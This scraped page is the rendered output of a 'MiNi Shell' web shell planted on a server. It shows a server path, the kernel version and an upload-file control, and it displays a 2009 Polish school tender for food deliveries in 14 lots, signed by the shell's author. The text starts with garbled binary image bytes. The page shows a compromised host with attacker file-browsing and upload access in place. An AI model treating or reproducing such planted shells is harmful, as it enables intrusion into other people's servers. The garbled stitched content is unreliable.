JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090730/123563-N-2009.html

<p class="kh_header"><b>Tomaszów Lubelski: Sukcesywna dostawa artykułów spożywczych do stołówki szkolnej przy internacie Zespołu szkół Nr 3 w Tomaszowie Lubelskim przy ul. Hallera 5
Przedmiot zamówienia został podzielony na 14 zadań od Nr 1-14</b><br>
<b>Numer ogłoszenia: 123563 - 2009; data zamieszczenia: 30.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół nr 3 im. Macieja Rataja , ul. Hallera 5, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6650505, faks 084 6650505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsnr3tomaszow.internetdsl.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorzadowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artykułów spożywczych do stołówki szkolnej przy internacie Zespołu szkół Nr 3 w Tomaszowie Lubelskim przy ul. Hallera 5
Przedmiot zamówienia został podzielony na 14 zadań od Nr 1-14.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych takich jak : pieczywo, mleko i jego przetwory , mięso
jadalne i surowce rzeźne , wyroby wędlinirskie , różne produkty spożywcze , ryby przetworzone i konserwowane, drób, mrożonki, owoce świeże, warzywa, jaja, produkty mączne gotowe, makarony, ziemniaki ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.61.25.00-6, 15.50.00.00-3, 15.11.00.00-2, 15.13.11.20-2, 15.80.00.00-6, 15.20.00.00-0, 15.11.20.00-6, 15.33.11.00-8, 03.12.10.00-5, 03.14.25.00-3, 15.85.10.00-8, 15.85.11.00-9, 03.21.21.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki wynikające z niniejszej Specyfikacji Istotnych Warunków Zamówienia oraz warunki wynikające z art. 22 ustawy z 29 stycznia 2004 r.Prawo zamówień publicznych Dz. U. nr 19 poz.177 z pózn. zm. w szczególności Wykonawca, który:
- posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
- posiada niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
- znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
- nie podlega wykluczeniu w myśl postanowień art. 24 ust. 1 i 2 ustawy z 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. nr 19 poz.177 z pózn. zm.
Spełnienie warunków udziału w postępowaniu podlegać będzie ocenie Zamawiającego dokonywanej metodą spełnia  -nie spełnia w oparciu o informacje zawarte w dokumentach wyszczególnionych w SIWZ. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia i dokumenty potwierdzające spełnienie przez Wykonawcę warunku udziału w postępowaniu :
     a. Oświadczenie, że Wykonawca spełnia warunki zawarte w Specyfikacji Istotnych Warunków Zamówienia  oraz nie podlega wykluczeniu zgodnie z art. 22 i 24 ustawy Prawo zamówień publicznych 
     b.  Aktualny wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, podpisany przez osobę uprawnioną z adnotacja, że dane zawarte w danym rejestrze ewidencji nie uległy zmianie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zsnr3tomaszow.internetdsl.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespól Szkół Nr 3 w Tomaszowie Lubelskim , ul. Hallera 5 , 22-600 Tomaszów Lubelski
tel.fax 084 665 05 05.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2009 godzina 12:00, miejsce: Zespół Szkół Nr 3 Tomaszów Lubelski , ul. Hallera 5 , 22-600 Tomaszów Lubelski , sekretariat szkoły - parter.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> pieczywo.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb  zwykły  krojony    500 g	szt.	7200
Chleb razowy 500 g	szt.	150
Bułka 50 g	szt	11000
Bułka 100 g.	szt.	200
Bułka tarta	kg	70
Placek cebularz 100 g	szt.	400
Drożdżówka 100 g	szt.	1800
Pierożki z kaszą lub kapustą porcja nie mniej jak 120g        	szt.	2200
Krokiety/paszteciki/ nie mniejsze jak 50 g 	szt.	150
Pączki  60 g	szt.	400
Makowiec 500 g	Kg.	15
Zapiekanki nie mniej jak 200 g	szt	200.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> mleko i jego przetwory.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko spożywcze 2%  tł.  w opak. 1 l.litr	3200
Śmietana 18 % tł.   litr	450 
Smietana 18% op.400g	szt	 30
Masło ex .zawartość tł. 82,5%   op. 0.200 g	kg.	110 
Twaróg półtłusty 	Kg.	 250 
Ser topiony  100 gSzt.	1300 
Ser zółty   półtłusty	Kg.	200 
Jogurt  kubek  150 ml. 	Szt.	3100 
Serek homogenizowany op.100 g	Szt.	1300 
Ser żółty  salami 	Kg.	70 
Serek smakosz	szt	90.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> mięso jadalne i surowce rzeźne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mięso mielone wieprzowo-wołowe	kg.	320
Mięso  wieprzowe gulaszowe  II kl.	kg.	400 
Łopatka wieprzowa z  kością 	kg.	120 
Łopatka wieprzowa b/ kośći	kg.	30 
Karkówka wieprzowa  z kością 	kg.	50 
Karkówka b/k	kg.	40 
Schab  wieprzowy z kością 	kg.	260
Schab b / kości 	kg.	50 
Wątroba wieprzowa	kg.	40 
Żeberka  wieprzowe	kg.	100 
Smalec 	kg.	10.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> wyroby wędliniarskie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Boczek wędzony parzony	kg.	20 			
baleron	kg.	25 			
Kiełbasa krakowska 	kg.	200			
Kiełbasa przysmak-śniadaniowa	kg.	45 			
Kiełbasa zwyczajna	kg.	110 			
Kiełbasa łopatkowa	kg.	40 			
Kiełbasa wiejska 	kg.	60 			
Kiełbasa toruńska 	kg.	60			
Kiełbasa golonkowa	kg.	45 			
Kiełbasa żywiecka 	kg.	40 			
Kiełbasa szynkowa	kg	10			
Mielonka wieprz.	kg.	50 			
Ogonówka	kg.	500			
Paróweczki wieprzowe	kg.	200			
Mortadela 	kg.	25 			
Pasztet zapiekany	kg.	35 			
Pieczeń rzymska 	kg.	130			
Salceson ozorkowy 	kg.	45 			
Szynka wieprzowa	kg.	120 			
Pasztetowa 	kg.	30 			
Flaki wieprzowe odgotowane krojone 	kg.	40.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukier biały kryształ- luzem a 50 kg	800	Kg
cukier puder   op. 500g	10	Szt
Cukier waniliowy	10	Szt
Barszcz czerwony inst. słoik 160 g	10	Szt		
Chrzan tarty w słoiku op.  200 g	100	Szt		
Kakao ciemne sypkie  100 g	60	Szt		
Dżem wiśniowy  nie mniej jak 280	200	Szt		
Dżem  truskawkowy nie mniej jak 280 g	400	Szt		
Dżem  śliwkowy - nie mniej jak 280g	200	Szt		
Fasolka konser. biała  op. 400 g	10	szt				
Fasolka konserwowa czerwona op.nie mniejsze jak 425g	50 szt	
Groszek konserwowy  op.nie mniej jak 400 g  	150	Szt		
Gałka muszkatołowa mielona 20 g	10	Szt		
Herbata granulowana 100 g 	140	Szt		
Herbata expresowa op. 100 g	50	Op
Kawa inka  op. 200 g	45	Szt		
Keczup PIKANTNY firmy Roleski  lub równoważny poj. 500 g	250	Szt
Keczup łagodny poj  500 g 	50	szt
Koncentrat pomidorowy 30 % op. 900 ml 	220	Szt		
Koncentrat pomidorowy  30%Op. -250 g 	100	Szt		
Kukurydza konserwowa  słodka  -op.nie mniejsze jak 400 g 	200	Szt		
Kwasek cytrynowy  20g	130	Szt		
Majonez  dekoracyjny nie mniej  jak 700 g  Firmy Winiary lub inny równoważny
150 szt 		
Musztarda  kremska op. nie mniej 180g	180	Szt		
Majeranek  torebka  op. 20g	90	Szt		
Miód naturalny wielokwiatowy op. słoik  1300 kg	  5 szt			
Miód naturalny  op. 410 g	15	Szt				
Ocet  spirytusowy 10 %  op. 05 l. 	12	Szt		
Ocet winny  op. 500 ml. 	10	Szt		
Przyprawa do zup w płynie  op. - 1 l  Firmy Winiar lub inny  równoważny 130 szt		
Pieprz naturalny czarny mielony Op.500 g 9 Szt		
Pieprz ziołowy  torebka  op. 20 g	10	Szt		
Papryka w proszku słodka mielona Op. 500 g	8	Szt		
Pietruszka susz-  natka op 500 g 	8	Szt		
Koper susz nać   op. 500 g	8	Szt				
Przyprawa do potraw typu Vegeta lub inny równoważny op.200 g	180 Szt				
Ryż biały  op. 1 kg	100	Kg		
Rosołki drobiowe op. 180 g Firmy Winiar lub równoważny 270	Op		
Sól kuchenna  spożywcza 	140	Kg		
Ziele angielskie torebka 15g	10	Szt		
Liść laurowy  torebka 15 g	20	Szt		
Mąka ziemniaczana  op. 500 g	15	Kg		
Mąka pszenna  luksusowa  typ 550  	390	Kg		
Olej jadalny Uniwersalny op. 3 l.	25	Szt		
Olej  jadalny uniwersalny Op. 1 litr	200	Szt		
Olej słonecznikowy 1 l.	100	Szt
Margaryna stołowa zwykła kostka  250 g	40	Szt		
Margaryna  śniadaniowa z zaw. Olejów roslinnych op. 500 g	900	Szt		
Kasza jęczmienna  wiejska op.1000g	30	Kg		
Kasza gryczana  op. 1000 g	40	Kg		
Płatki kukurydziane  zwykłe op.425 g	100	Szt.		
 Płatki kukurydziane zwykłe op.1000g 	40	szt				
Ogórek konserwowy  poj.0.9 l	160	Szt
Papryka konserwowa poj.  0,9 l 	150	Szt
Pieczarka konserwowa poj.900 ml	10	Szt
Serek top. Krążki  op. 200 g	430	szt				
Serek top. plastry op.150g	600	Szt				
Szyneczka  drobiowa  nie mniej jak  op. 110g	700	Szt				
Szyneczka  wieprzowa nie mniej jak  op. 110g	60	Szt				
Pasztet drobiowy  nie mniej jak op. 135g 	700	Szt				
Delikat do mięs  op. 700 g	5	Szt
Delikat do ryb op. 700g	2	Szt
Delikat do drobiu op. 700 g	6 	Szt
Sos sałatkowy ogrodowy op.700 g	13	Szt
Baton mars snikres   op 300g	600	Szt				
Wafelki  ciastka op. 300 g	300	Szt				
Wafelek princessa	100	szt				
Cukierki czekoladowe -wedell- lub inne równoważne 	10	Kg				
Baton czekoladowy   op. 60 g	250	Szt				
Czekolada wedell  lub inna równoważna  op. 100 g	500	Szt
Sok - napój kartonik op. 0.33 l	200	Szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ryby przetworzone i konserwowane.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z ryby mrożony mintaj  SHP	Kg	100			
Filet z ryby mrożony morszczuk SHP	Kg 	120			
Filet śledziowy w zalewie octowej op.4 kg      	Kg	20			
Filet śledziowy b/skóry w oleju  op. 4 kg 	kg	48			
Makrela wędzona 	Kg	40
Konserwa rybna szprot w oleju  op. nie mniej jak   170 g	Szt	200			
Konserwa rybna szprot w pomidorach op. nie mniej jak 170 gSzt	130 			
Sałatka  rybna  z makreli -ALUPACK op. nie mniej jak 135 g 	Szt	700			
Paprykarz szczeciński -ALUPACK op. nie mniej jak 135 g	Szt	700			
Paprykarz szczeciński op. 300 g	szt	100.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> drób.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet drobiowy  mrożony -	kg.	420 
Porcje rosołowe	kg.	120
Mięso drobiowo - gulaszowe 	kg.	130
Ćwiartka kurczaka  mrożona  	kg.	200.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> mrożonki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mieszanka warzywna mrożona 7 skł. Op.2,5 kg- 	kg	120 
Kalafior mrożony  Op. 2.50 kg-	kg	40 
Fasolka szparagowa Mrożona  op.2,5 kg- 	kg	20 
Szpinak mrożony op. 2,5kg - 	kg	20 
Pyzy ziemniaczane mrożone op. 450-500g - 	 kg	100.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> owoce świeże.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jabłka  gat.I 	kg	1200 

Śliwka  gat. I 	kg	120.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.12.10.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> warzywa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Burak ćwikła 	kg.	400
Cebula  biała	kg.	330
marchew	kg.	670
seler  korzeń  	kg.	15
por 	kg.	50
Pietruszka korzeń kg.	15
Kapusta czerwona	kg.	30
Kapusta biała 	kg.	600
Kapusta włoska 	kg.	100
Kapusta pekińska	kg.	330
Kapusta kiszona	kg.	200
Ogórek kwaszony kg.	170
Fasola biała Jaś	kg.	50
Groch  łupany   	kg.	20
Czosnek 	kg.	20
Pieczarka 	kg.	70
Papryka  świeża 	kg	30.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> jaja kurze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze świeże kl. I szt  6500.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> produkty mączne gotowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pierogi ruskie  domowe	 	400 kg
Pierogi z kapustą 	- 	50 kg
Pyzy ziemniaczane .- 	80 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.10.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> makarony.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Makaron świderki  op. 2 KG-	szt	80
Makaron  nitka   op. 1 kg-	Szt	30
Makaron  spagetti  op. 1 kg- 	szt	100
Makaron  wstążka cięta  op. 2 kg-	Szt	30
Makaron łazanki  op. 2 kg -	Szt	30
Makaron świder  op. 2 kg-	szt	20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> ziemniaki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki jadalne późne  op. 30 kg - 6000 kg
Polska Norma - PN-75-R-744 530.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com